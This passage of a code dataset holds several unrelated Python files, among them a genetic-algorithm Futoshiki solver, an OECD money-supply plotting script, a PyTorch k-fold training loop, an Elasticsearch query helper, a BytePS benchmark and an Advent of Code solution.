200*0.3 highest = best of population\n highest = int(population_size * old_population_percent)\n highest_mats = sorted_fitness_scores_values[:highest]\n chosen_population = []\n for key,value in highest_mats:\n chosen_population.append(population[key]) # add\n return chosen_population\n\n# ------- create_new_generation ---------------------------------------------------------------------#\n# genareate a new generation - \ndef create_new_generation(chosen_population, lamarck = False):\n new_amount = int(population_size * new_population_percent)\n amount_random = int(population_size * random_population_percent)\n new_generation = {}\n new_scores = {}\n # takes best of current populations and keeps them alive for next gen\n for matrix in chosen_population:\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n 
new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n # creates new matrix according to crossovers between parent matrixs\n counter = 0\n while counter < new_amount:\n matrix = create_new_population(population, fitness_scores)\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n if key not in new_generation:\n counter += 1\n new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n # rand new population\n counter = 0\n while counter < amount_random:\n matrix = create_random_population()\n if lamarck:\n matrix = optimization(matrix)\n key = str(matrix)\n if key not in new_generation:\n counter += 1\n new_generation[key] = matrix\n new_scores[key] = fitness(matrix)\n return new_generation, new_scores\n\n# ------- optimization ------------------------------------------------------------------------------#\n# oprimizes a matrix by finding the cells where the constrains aren't settled\n# and randomly choose one of the problimatic cells and to fix to the right value\ndef optimization(original_matrix):\n matrix = original_matrix.copy()\n for i in range(N):\n row = matrix[i] # looking for duplicates in row i\n row_set = set(row) # unique items in the row\n if len(row_set) < N: # which means we have missing digits and duplicates\n missing = list(set(numbers).difference(row_set)) # list of missing numbers in the row\n repeating = list(set([i for i in list(row) if list(row).count(i)>1])) # list of duplicated numbers in the row\n chosen_missing = missing[random.randrange(0, len(missing))] # randomly choose one of each\n chosen_repeating = repeating[random.randrange(0, len(repeating))]\n \n repeating_index = [] # getting all the places where the value is equal to the chosen duplicated number\n for j in range(N):\n if row[j] == chosen_repeating: # appending each index that satisfies this condition\n repeating_index.append(j)\n\n chosen_j = repeating_index[random.randrange(0, len(repeating_index))] # choosing randomly one index \n if (i, chosen_j) not in black_list: # making sure we're not changing a given digits (part of the constraints)\n matrix[i, chosen_j] = chosen_missing\n \n col = matrix[:, i] # looking for duplicates in column i, logically identical as with row\n col_set = set(col)\n if len(col_set) < N:\n missing = list(set(numbers).difference(col_set))\n repeating = list(set([i for i in list(col) if list(col).count(i)>1]))\n chosen_missing = missing[random.randrange(0, len(missing))]\n chosen_repeating = repeating[random.randrange(0, len(repeating))]\n \n repeating_index = []\n for j in range(N):\n if col[j] == chosen_repeating:\n repeating_index.append(j)\n\n chosen_j = repeating_index[random.randrange(0, len(repeating_index))]\n if (chosen_j, i) not in black_list:\n matrix[chosen_j, i] = chosen_missing\n \n if fitness(original_matrix) < fitness(matrix): # we return this matrix only if its really optimized\n return matrix\n \n return original_matrix # otherwise stay with the original matrix\n\n# used each time we create a changed and better solution matrix - initialized vars needed\ndef initialize(config_file = \"config.txt\"):\n global index, config_list, initial_matrix, greater_constraints, max_fitness, numbers, max_score_list_reg, \\\n av_score_list_reg, max_score_list_darwin, av_score_list_darwin, max_score_list_lamark, av_score_list_lamark, \\\n accuracy_reg, accuracy_darwin, accuracy_lamark, maximum_generation\n max_score_list_reg, av_score_list_reg = [], []\n max_score_list_darwin, av_score_list_darwin = [], []\n max_score_list_lamark, 
av_score_list_lamark = [], []\n index = 0\n config_list = read_config_list(config_file) # board config txt file\n initial_matrix = build_matrix(config_list) # matrix of all configuration - empty\n greater_constraints = build_greater_than_dict(config_list) # dict with all constarins\n max_fitness = N * N * 2 + len(greater_constraints) * constraint_weight\n numbers = list(np.arange(1,N + 1))\n accuracy_reg, accuracy_darwin, accuracy_lamark = 0, 0, 0\n maximum_generation = N ** 3\n\n# used to restart varubales between the execution of diffrent genetic algo\n# keep algo independent one from another\ndef restart():\n global population, fitness_scores, generation\n generation = 1\n population = build_population_rows(initial_matrix) # init poulation matrix and dict - filled #TODO\n max_fitness = N * N * 2 + len(greater_constraints) * constraint_weight\n fitness_scores = build_fitness_scores(population) # dict\n\n# get average of a list\ndef average_list_val(lst):\n return sum(lst) / len(lst)\n\n# ------- our genetic algorithms ----------------------------------------------------------------#\n# the naive regular genetic algo - no optimization made\ndef regular_ga():\n restart()\n global population, fitness_scores, generation, accuracy_reg\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population)\n # print(generation, \":\", max(fitness_scores.values()))\n \n max_score_list_reg.append(max(fitness_scores.values())) # max\n av_score_list_reg.append(average_list_val(fitness_scores.values())) # mean\n generation = generation + 1\n \n for key in fitness_scores.keys():\n fit = fitness_scores[key]\n if fit == max_fitness:\n accuracy_reg = 1\n success_message(population[key])\n return\n \n accuracy_reg = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n \n# optimize all matrixs, fitness score calc after opt.\n# next gen made BEFORE optimization \ndef darwin_ga():\n restart()\n global population, fitness_scores, generation, accuracy_darwin\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population)\n # print(generation, \":\", max(fitness_scores.values()))\n \n generation = generation + 1\n \n for key, matrix in population.items():\n optimized = optimization(matrix)\n fit = fitness(optimized)\n if fit == max_fitness:\n accuracy_darwin = 1\n max_score_list_darwin.append(fit)\n av_score_list_darwin.append(average_list_val(fitness_scores.values()))\n success_message(optimized)\n return\n \n max_score_list_darwin.append(max(fitness_scores.values())) # max\n av_score_list_darwin.append(average_list_val(fitness_scores.values())) # mean\n \n accuracy_darwin = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n\n# optimize all matrixs, fitness score calc after opt. 
\n# next gen made AFTER optimization\ndef lamarck_ga():\n restart()\n global population, fitness_scores, generation, accuracy_lamark\n while generation != maximum_generation:\n best_old_population = choose_best(population, fitness_scores)\n population, fitness_scores = create_new_generation(best_old_population, True)\n # print(generation, \":\", max(fitness_scores.values()))\n \n max_score_list_lamark.append(max(fitness_scores.values())) # max\n av_score_list_lamark.append(average_list_val(fitness_scores.values())) # mean\n \n generation = generation + 1\n \n for key in fitness_scores.keys():\n fit = fitness_scores[key]\n if fit == max_fitness:\n accuracy_lamark = 1\n success_message(population[key])\n return\n \n accuracy_lamark = round(max(fitness_scores.values()) / max_fitness, 2)\n approx_message()\n# ----------------------------------------------------------------------------------------------#\n\ndef success_message(matrix):\n print(\"An optimal solution found after\", generation, \"generations\")\n print_solution(matrix)\n\ndef approx_message():\n matrix_id, fitness = max(fitness_scores.items(), key=lambda x: x[1])\n matrix = population[matrix_id]\n print(\"An approximate solution found after\", generation, \"generations, with accuracy of\", str(round(fitness/max_fitness, 2)))\n print_solution(matrix)\n \n# printing a represantation matrix with signs according to the given constraints\ndef print_solution(matrix):\n rep_mat = np.full((2*N-1, 2*N-1), \" \")\n for x1 ,y1 in greater_constraints.keys():\n for x2, y2 in greater_constraints[(x1 ,y1)]:\n if x1 == x2:\n if y1 < y2:\n rep_mat[x1*2, y1*2 + 1] = \">\"\n else:\n rep_mat[x1*2, y1*2 - 1] = \"<\"\n elif y1 == y2:\n if x1 < x2:\n rep_mat[x1*2+1, y1*2] = \"V\"\n else:\n rep_mat[x1*2-1, y1*2] = \"A\"\n \n for i in range(N):\n for j in range(N):\n rep_mat[i*2,j*2] = matrix[i,j]\n \n print(tabulate(rep_mat, tablefmt='fancy_grid'))\n\n# -------- plot --------------------------------------------------------------------------------#\n# creates a comparision plot for a config txt file with all three genetic algorithms\ndef plot():\n board_size = str(N) + \"*\" + str(N)\n plt.plot(max_score_list_reg, label = \"Regular MAX score\", color = 'b')\n plt.plot(av_score_list_reg, label = \"Regular AVERAGE score\", color = 'c', linestyle ='--')\n plt.plot(max_score_list_darwin, label = \"Darwin MAX score\", color ='g')\n plt.plot(av_score_list_darwin, label = \"Darwin AVERAGE score\", color ='y', linestyle ='--')\n plt.plot(max_score_list_lamark, label = \"Lamark MAX score\", color ='r')\n plt.plot(av_score_list_lamark, label = \"Lamark AVERAGE score\", color ='m', linestyle ='--')\n plt.xlabel('generation')\n plt.ylabel('Fitness score')\n level = [\"EASY\", \"TRICKY\"]\n plt.title(\"Comparision of algorithms - Board: \" + str(board_size) + \" Level: \" \n + str(level[1]) + '\\n' + \"Accuracy: Regular: \" + str(accuracy_reg) +\n \" Darwin: \" + str(accuracy_darwin) + \" Lamark: \" + str(accuracy_lamark))\n plt.legend() \n plt.show()\n","repo_name":"shiraznave/Genetic-Algorithm-Futoshiki-Puzzle","sub_path":"code/ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":22123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"5067586663","text":"from random import sample\r\n\r\nclass randomPhoneNumber():\r\n def __init__(self,rows, limit, country):\r\n self.rows= rows\r\n self.Limit= limit\r\n self.country= country\r\n self.destFile= 
rf'work\\1.PhoneNumber_SmallTest\\RandomPhoneNumber_{country}_{rows}rows.txt'\r\n\r\n def number(self):\r\n _list= [0,1,2,3,4,5,6,7,8,9]\r\n listRandom= sample(_list,self.Limit)\r\n return listRandom\r\n \r\n def write(self):\r\n with open(self.destFile, 'w') as f:\r\n for j in range(self.rows):\r\n resolve= ''\r\n resolve+= str(self.country)+ ' '+f'9'\r\n\r\n for i in self.number():\r\n resolve+= f'{i}'\r\n print(resolve)\r\n f.write(''.join(resolve+ \"\\n\"))\r\n f.close()\r\n\r\nrows= 10\r\nnumberLimit= 8\r\ncountryCode= '+886'\r\nrandomN= randomPhoneNumber(rows, numberLimit, countryCode)\r\nrandomN.write()","repo_name":"data0504/PythonSmallTest","sub_path":"PhoneNunber.py","file_name":"PhoneNunber.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34177246972","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 18 08:09:38 2021\n\n@author: wanderer\n\"\"\"\n\n# https://github.com/LenkaV/CIF/blob/develop/examples/CI_minimalPipeline.ipynb\n\n# import os\nfrom cif import cif\nimport pandas as pd\nimport datetime\n\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\n\n# print(os.environ['X13PATH'])\n# only for seasonal adjustment\n\nmpl.rcParams['font.family'] = 'Helvetica Neue'\nsave_loc = '~/Desktop/hu'\n\nredownloaddata = True\n\nif redownloaddata:\n country = 'CHN' # Select target country\n \n bw = False # True for black and white visualisations\n \n saveData = False # Save the original data sets if True\n \n strDate = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M\")\n \n #outputDir = os.path.join('plots_' + country + '_' + strDate)\n #os.makedirs(outputDir, exist_ok = True)\n \n data_all, subjects_all, measures_all = cif.createDataFrameFromOECD(countries = [country], dsname = 'MEI', frequency = 'Q',\n subject = ['NAEXCP01','MABMM301'],\n measure = ['STSA','IXOBSA'])\n \n #data_rs, subjects_rs, measures_rs = cif.createDataFrameFromOECD(countries = [country], dsname = 'QNA', subject = ['B1_GE'], frequency = 'Q')\n \n print('Downloaded MEI data set size: %d x %d' % (data_all.shape[0], data_all.shape[1]))\n # print('Downloaded reference data set size: %d x %d' % (data_rs.shape[0], data_rs.shape[1]))\n \n '''\n if saveData:\n # Save the data\n data_all.to_csv(os.path.join(outputDir, 'data_all.csv'))\n subjects_all.to_csv(os.path.join(outputDir, 'subjects_all.csv'))\n measures_all.to_csv(os.path.join(outputDir, 'measures_all.csv'))\n data_rs.to_csv(os.path.join(outputDir, 'data_rs.csv'))\n subjects_rs.to_csv(os.path.join(outputDir, 'subjects_rs.csv'))\n measures_rs.to_csv(os.path.join(outputDir, 'measures_rs.csv'))\n '''\n # print(data_all)\n \n data_all['time'] = data_all.index\n data_all['time'] = pd.PeriodIndex(data_all['time'], freq = 'Q')\n data_all = data_all.set_index('time')\n\n \n deflator = pd.read_csv(save_loc + r'/GDP Deflator YoY Quarterly China.csv')\n deflator = deflator.iloc[25:]\n deflator.rename(columns = {'Unnamed: 0':'time'}, inplace = True)\n deflator.rename(columns = {'GDP Deflator: YoY: Quarterly: China':'GDP deflator'}, inplace = True)\n deflator['time'] = deflator['time'].apply(lambda x: pd.to_datetime(str(x)))\n deflator['time'] = pd.PeriodIndex(deflator['time'], freq = 'Q')\n deflator = deflator.set_index('time')\n \n # Convert YOY deflator to constant price (2015Q1) deflator\n deflator['GDP deflator'] = deflator['GDP deflator'].astype(float)\n deflator = deflator['GDP 
deflator'].apply(lambda x:1 + x/100)\n deflator = deflator.cumprod()\n deflator = deflator/(deflator['2015Q1'])\n \n deflator.to_pickle(save_loc + r'/CHNdefl.pkl') \n data_all.to_pickle(save_loc + r'/CHNbm.pkl')\n\n \ndeflator = pd.read_pickle(save_loc + r'/CHNdefl.pkl')\ndata_all = pd.read_pickle(save_loc + r'/CHNbm.pkl')\ndata = pd.DataFrame({'Broad money' : []})\ndata['Broad money'] = data_all['CHN']['MABMM301']['IXOBSA']\ndata['Nominal GDP'] = data_all['CHN']['NAEXCP01']['STSA']\ndata = pd.concat([data, deflator], axis=1)\ndata['Real GDP'] = data['Nominal GDP'] * data['GDP deflator']\npltdata = data.drop('GDP deflator', axis=1)\n\n# Same period last year\npltdata = pltdata.pct_change(periods = 4)\npltdata = 100*pltdata\n\n\n# Graphing!\nfig, axes = plt.subplots(1,1, figsize=(12,6), sharex=True)\npltdata.plot(subplots=False, ax=axes, marker='o', ms=3)\n\n# add titles\naxes.set_title('Quarterly ' + 'M3, nominal and real GDP percentage change',\n fontsize=14,\n fontweight='demi')\n\n# add axis labels\naxes.set_ylabel('% change\\n(Annualized)', fontsize=12, fontweight='demi')\naxes.set_xlabel('Date', fontsize=12, fontweight='demi')\n\naxes.yaxis.set_major_formatter(mticker.PercentFormatter())\n\n# bold up tick axes\naxes.tick_params(axis='both', which='major', labelsize=11)\n\n\nplt.savefig('CHNbm.png', dpi=300)\n","repo_name":"Icosahedral-Dice/FE","sub_path":"CN_M2-GDP/CHNbm.py","file_name":"CHNbm.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"23446820829","text":"def reset_weights(m): # receives the model\n ### helper that re-initializes a model's parameters before the model is reused\n '''\n Try resetting model weights to avoid\n weight leakage.\n '''\n for layer in m.children(): # iterate over the parameters of every layer in the model\n if hasattr(layer, 'reset_parameters'): # if the layer exposes a 'reset_parameters' attribute \n # print(f'Reset trainable parameters of layer = {layer}')\n layer.reset_parameters() # re-initialize all parameters in the layer\n\nepoch = 10\nsm = nn.Softmax(dim=1)\ncriterion = nn.CrossEntropyLoss()\n\nfold_train_losses = []\nfold_val_losses = []\n\nrunning_loss = torch.zeros(epoch)\nval_loss = torch.zeros(epoch)\naccuracy = torch.zeros(epoch)\n\ntrain_losses = []\nval_losses = []\n\n\n#kf = KFold(n_splits=5, shuffle=True)\nfor fold, (train_ind, valid_ind) in enumerate(kf.split(train_data)): # enumerate yields the fold index \n #kf: instance of KFold() #kf.split(train_data) -> returns the train and validation sets as a tuple of indices. 
#4/5 of the samples go to the train set, i.e. randomly drawn indices are returned as lists\n print('Starting fold = ', fold)\n # define the samplers\n train_sampler_kfold = SubsetRandomSampler(train_ind) # wraps train_ind in an object the DataLoader's sampler argument accepts\n valid_sampler_kfold = SubsetRandomSampler(valid_ind)\n \n # define the data loaders\n train_loader_kfold = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=train_sampler_kfold) \n # randomly fetches batch_size samples of train_data at the sampler (train_ind) indices \n valid_loader_kfold = torch.utils.data.DataLoader(train_data, batch_size=batch_size, sampler=valid_sampler_kfold)\n \n model.apply(reset_weights) # reset parameters -> to measure performance on each new fold (a new training/validation split), the network must be re-initialized and its loss recorded separately.\n optimizer = optim.Adam(model.parameters(), lr=0.003)\n \n for e in np.arange(epoch): # (stores fold 1-epoch 1 loss, fold 1-epoch 2 loss, ...) -> the training loss is stored for every epoch of every fold.\n print('Starting epoch = ', e)\n \n # Training\n model.train()\n for Xtrain, ytrain in train_loader_kfold:\n # Xtrain = Xtrain.reshape(Xtrain.shape[0],-1)\n optimizer.zero_grad()\n logits = model(Xtrain)\n loss = criterion(logits, ytrain)\n loss.backward()\n optimizer.step()\n \n running_loss[e] += loss.item()\n \n # Validation\n model.eval()\n with torch.no_grad():\n for Xtrain, ytrain in valid_loader_kfold:\n # Xtrain = Xtrain.reshape(Xtrain.shape[0],-1)\n logits = model(Xtrain) \n val_loss[e] += criterion(logits, ytrain)\n \n ps = sm(logits) \n top_p, top_class = ps.topk(1,dim=1)\n equals = top_class == ytrain.reshape(top_class.shape)\n accuracy[e] += torch.mean(equals.type(torch.float)) # the \"torch array\" is already zero-filled with one slot per epoch (fixed size, unlike a Python list), so accumulate with +=\n \n \n train_losses.append(running_loss/len(train_loader_kfold)) # accumulated training loss / number of batches (reported once per epoch) # it's a list, so use append to add\n val_losses.append(val_loss/len(valid_loader_kfold)) # accumulated validation loss / number of batches\n \n print(\"Epoch: {}/{}.. \".format(e+1, epoch), \n \"Training Loss: {:.3f}.. \".format(running_loss[e]/len(train_loader_kfold)), # prints the current epoch's loss (mean of the errors)\n \"Validation Loss: {:.3f}.. 
\".format(val_loss[e]/len(valid_loader_kfold)),\n \"Validation Accuracy: {:.3f}\".format(accuracy[e]/len(valid_loader_kfold)))\n \n# fold_train_losses.append()\n# fold_val_losses.append()\n","repo_name":"kissess/DL_final","sub_path":"k-fold .py","file_name":"k-fold .py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"31839093428","text":"import os\n\nfrom ament_tools.helper import argparse_existing_dir\nfrom ament_tools.package_types import parse_package\nfrom ament_tools.packages import find_package_paths\nfrom ament_tools.packages import find_unique_packages\nfrom ament_tools.topological_order import topological_order_packages\n\n\ndef prepare_arguments(parser):\n parser.add_argument(\n 'basepath',\n nargs='?',\n type=argparse_existing_dir,\n default=os.curdir,\n help='Base paths to recursively crawl for packages',\n )\n parser.add_argument(\n '--topological-order', '-t',\n action='store_true',\n default=False,\n help='Order output based on topological order',\n )\n parser.add_argument(\n '--names-only',\n action='store_true',\n default=False,\n help='Print the names of the packages but not the path',\n )\n parser.add_argument(\n '--paths-only',\n action='store_true',\n default=False,\n help='Print the paths of the packages but not the name',\n )\n parser.add_argument(\n '--depends-on',\n help='Only show packages which depend on the given package',\n )\n return parser\n\n\ndef get_unique_depend_names(package):\n names = {\n d.name for d in\n package.build_depends +\n package.buildtool_depends +\n package.build_export_depends +\n package.buildtool_export_depends +\n package.exec_depends +\n package.test_depends +\n package.doc_depends\n if d.evaluated_condition\n }\n for g in package.group_depends:\n if g.evaluated_condition:\n names |= set(g.members)\n return names\n\n\ndef main(options):\n lines = []\n if not options.topological_order:\n package_paths = find_package_paths(options.basepath)\n # parse package manifests\n packages = {}\n for package_path in package_paths:\n package_abs_path = os.path.join(options.basepath, package_path)\n package = parse_package(package_abs_path)\n packages[package_path] = package\n # evaluate conditions\n for package in packages.values():\n package.evaluate_conditions(os.environ)\n # expand group dependencies\n for package in packages.values():\n for group in package.group_depends:\n if group.evaluated_condition:\n group.extract_group_members(packages.values())\n for package_path, package in packages.items():\n if options.depends_on is not None:\n if options.depends_on not in get_unique_depend_names(package):\n continue\n if options.names_only:\n lines.append(package.name)\n elif options.paths_only:\n lines.append(package_path)\n else:\n lines.append(package.name + ' ' + package_path)\n lines.sort()\n else:\n packages = find_unique_packages(options.basepath)\n packages = topological_order_packages(packages)\n for package_path, package, _ in packages:\n if options.depends_on is not None:\n if options.depends_on not in get_unique_depend_names(package):\n continue\n if options.names_only:\n lines.append(package.name)\n elif options.paths_only:\n lines.append(package_path)\n else:\n lines.append(package.name + ' ' + package_path)\n for line in lines:\n print(line)\n\n\n# meta information of the entry point\nentry_point_data = {\n 'verb': 'list_packages',\n 'description': 'List names and relative paths of packages',\n # Called for execution, given parsed 
arguments object\n 'main': main,\n # Called first to setup argparse, given argparse parser\n 'prepare_arguments': prepare_arguments,\n}\n","repo_name":"mintforpeople/robobo-ros2-ios-port","sub_path":"ros2_mod_ws/install/lib/python3.7/site-packages/ament_tools/verbs/list_packages.py","file_name":"list_packages.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}{"seq_id":"43179514800","text":"import sys\nsys.stdin = open(\"input_4.txt\", \"r\")\n\n\ndef game(p1_s, p2_s):\n if p1_s[1] == p2_s[1]:\n return p1_s\n elif p1_s[1] - p2_s[1] == -2 or p1_s[1] - p2_s[1] == 1:\n return p1_s\n elif p1_s[1] - p2_s[1] == -1 or p1_s[1] - p2_s[1] == 2:\n return p2_s\n\n\ndef play(li_test):\n if len(li_test) == 2:\n return game(li_test[0], li_test[1])\n if len(li_test) == 1:\n return li_test[0]\n# 4 3 0 1 2 3 8 4 4\n li_1 = li_test[:(len(li_test)+1)//2]\n li_2 = li_test[(len(li_test)+1)//2:]\n p1 = play(li_1)\n p2 = play(li_2)\n return game(p1, p2)\n\n # if N % 2 == 0: # even\n # for _ in range(N//2):\n # p1 = stack.pop(0)\n # p2 = stack.pop(0)\n # stack.append(game(p1, p2))\n # return\n # elif N % 2 == 1: # odd\n # for _ in range(N//2-1):\n # p1 = stack.pop(0)\n # p2 = stack.pop(0)\n # stack.append(game(p1, p2))\n # return\n\n\nT = int(input())\n\nfor TC in range(1, T+1):\n N = int(input())\n stack = []\n\n li = list(map(int, input().split()))\n li_li = [[0] for _ in range(N)]\n for i in range(N):\n li_li[i] = [i+1, li[i]]\n\n len_s = 0\n\n result = play(li_li)\n # while True:\n # len_s = len(stack)\n # play(len_s)\n # if len(stack) == 1:\n # break\n # result = stack.pop()\n\n print('#%d %d' % (TC, result[0]))\n","repo_name":"sondongmin0419/study","sub_path":"python/s_4880_2.py","file_name":"s_4880_2.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"6526583","text":"from aula80.dados import pessoas\n\n\n# nova_lista = map(lambda x: x * 2, lista)\n\n# nova_lista = [x *2 for x in lista] # multiplies each item in the list by 2\n# print(lista)\n# print(list(nova_lista))\n# preços= map(lambda p: p['preço'], produtos) # accessing each product's fields with a lambda\n# for preço in preços:\n# print(preço)\n\n\n\n\n\n# def aumenta_preco(p): # adds 5% to the price\n# p['preço'] = round(p['preço'] * 1.05,2) # round trims the result to 2 decimal places\n# return p\n#\n# novos_produtos = map(aumenta_preco, produtos)\n#\n# for produto in novos_produtos:\n# print(produto)\n\ndef aumenta_idade(p):\n p['nova_idade'] = round(p['idade'] * 1.20)\n return p\n\nnomes = map(aumenta_idade, pessoas)\n\nfor pessoa in nomes:\n print(pessoa)","repo_name":"Syferim/Curso-Python3","sub_path":"aula80/aula80_0_mapeamento.py","file_name":"aula80_0_mapeamento.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"11077668047","text":"from typing import Optional\n\nfrom elasticsearch import AsyncElasticsearch, NotFoundError\n\nfrom db.database import DatabaseInterface\nfrom models.paginate import Pagination\n\n# module-level variable that holds the connection object so it can be handed out later\nes_conn: Optional[AsyncElasticsearch] = None\n\n\nasync def get_database_conn() -> Optional[AsyncElasticsearch]:\n \"\"\"Return the elasticsearch connection if it has been created, otherwise None.\"\"\"\n return es_conn\n\n\nclass ElasticMixin(DatabaseInterface):\n \"\"\"Database interface implementation 
backed by elasticsearch.\"\"\"\n\n def __init__(self, elastic: AsyncElasticsearch) -> None:\n self.elastic: AsyncElasticsearch = elastic\n self.index_name: str\n\n async def get_record_from_db(self, id_: str) -> Optional[dict]:\n try:\n doc = await self.elastic.get(self.index_name, id_)\n except NotFoundError:\n return None\n doc = doc[\"_source\"]\n\n return doc\n\n async def get_list_from_db(self, query: dict, sorter: list = []) -> list[dict]:\n result = await self.elastic.search(\n index=self.index_name, sort=sorter, body=query, request_timeout=90,\n )\n\n try:\n docs = result[\"hits\"][\"hits\"]\n except KeyError:\n docs = []\n\n return docs\n\n async def create_query(self, paginate: Optional[Pagination], filters) -> dict:\n \"\"\"Build an elasticsearch query based on the given filters.\n Args:\n filters: Filter fields.\n Returns:\n dict: the composed query.\n \"\"\"\n request_body = {\n \"size\": paginate.size,\n \"from\": (paginate.number - 1) * paginate.size,\n \"query\": {},\n }\n if isinstance(filters, str):\n request_body[\"query\"] = {\n \"multi_match\": {\n \"query\": f\"{filters}\",\n \"type\": \"phrase\",\n \"fields\": [\"*\"],\n }\n }\n else:\n request_body[\"query\"] = {\"bool\": {\"must\": []}}\n for filter_ in filters:\n if filter_[1]:\n request_body[\"query\"][\"bool\"][\"must\"].append(\n {\"match_phrase\": {f\"{filter_[0]}\": f\"{filter_[1]}\"}}\n )\n\n return request_body\n\n async def create_sorter(self, sort: str = \"\") -> list:\n \"\"\"Convert the sort parameter to the required format.\n Args:\n sort: Sort field.\n Returns:\n list: list of sort fields.\n \"\"\"\n if not sort:\n return []\n direct = \"DESC\" if sort.startswith(\"-\") else \"ASC\"\n\n return [f\"{sort.replace('-', '')}:{direct}\"]\n","repo_name":"mburdonos/flask_auth","sub_path":"src/db/elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"22448919512","text":"from __future__ import absolute_import, division, print_function\n\nimport argparse\nimport os\nimport numpy as np\nimport timeit\n\nimport tensorflow as tf\nimport byteps.tensorflow.keras as bps\nfrom tensorflow.keras import applications\n\ntf.compat.v1.disable_eager_execution()\n\n# Benchmark settings\nparser = argparse.ArgumentParser(description='TensorFlow Synthetic Benchmark',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument('--fp16-allreduce', action='store_true', default=False,\n help='use fp16 compression during allreduce')\n\nparser.add_argument('--model', type=str, default='ResNet50',\n help='model to benchmark')\nparser.add_argument('--batch-size', type=int, default=32,\n help='input batch size')\n\nparser.add_argument('--num-warmup-batches', type=int, default=10,\n help='number of warm-up batches that don\\'t count towards benchmark')\nparser.add_argument('--num-batches-per-iter', type=int, default=10,\n help='number of batches per benchmark iteration')\nparser.add_argument('--num-iters', type=int, default=10,\n help='number of benchmark iterations')\n\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda\n\nbps.init()\n\n# pin GPU to be used to process local rank (one GPU per process)\nif args.cuda:\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, 
True)\n if gpus:\n tf.config.experimental.set_visible_devices(gpus[bps.local_rank()], 'GPU')\nelse:\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\ndata = tf.random.uniform([args.batch_size, 224, 224, 3])\ntarget = tf.random.uniform([args.batch_size, 1], minval=0, maxval=999, dtype=tf.int64)\n\ncallbacks = [\n # BytePS: broadcast initial variable states from rank 0 to all other processes.\n # This is necessary to ensure consistent initialization of all workers when\n # training is started with random weights or restored from a checkpoint.\n bps.callbacks.BroadcastGlobalVariablesCallback(0),\n]\n# Set up standard model.\nmodel = getattr(applications, args.model)(weights=None)\nopt = tf.keras.optimizers.Adam(0.01)\nopt = tf.keras.mixed_precision.experimental.LossScaleOptimizer(opt, loss_scale=\"dynamic\")\nopt = bps.DistributedOptimizer(opt)\n\nmodel.compile(loss=tf.keras.losses.categorical_crossentropy,\n optimizer=opt,\n metrics=['accuracy', 'top_k_categorical_accuracy'],\n experimental_run_tf_function=False)\nmodel.fit(data, target, epochs=10, steps_per_epoch=16, callbacks=callbacks)\n\ntest_loss, test_acc, test_topk = model.evaluate(data, target, verbose=2, steps=16)\nprint('\\nTest accuracy:', test_acc)\n","repo_name":"bytedance/byteps","sub_path":"example/keras/keras_synthetic_benchmark_tf2.py","file_name":"keras_synthetic_benchmark_tf2.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":3517,"dataset":"github-code","pt":"3"} +{"seq_id":"74893037521","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nAdvent of Code 2020 - Day 9 - Challenge 1\nhttps://adventofcode.com/2020/day/9\n\nSolution: 257342611\n\"\"\"\n\n__author__ = \"Filippo Corradino\"\n__email__ = \"filippo.corradino@gmail.com\"\n\n\ndef find_invalid(xmas, preamble):\n for i, value in enumerate(xmas[preamble:]):\n pool = set(xmas[i:i+preamble]) # \"preamble\" items before current value\n if all((value - x not in pool) for x in pool):\n return value\n raise RuntimeError(\"Didn't find any invalid number\")\n\n\ndef main(ifile='inputs/day_09_input.txt', preamble=25):\n with open(ifile) as file:\n xmas = [int(line) for line in file]\n value = find_invalid(xmas, preamble)\n print(f\"\\nFirst value to break the XMAS rule: {value}\\n\")\n return value\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"filippocorradino/advent_of_code_2020","sub_path":"day09_1.py","file_name":"day09_1.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44758386021","text":"import os\nimport nlp\nimport json\nimport random\nimport datetime\nimport tokenizers\nimport numpy as np\nimport transformers\nimport pandas as pd\nimport tensorflow as tf\nimport plotly.express as px\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\n\n\ndef 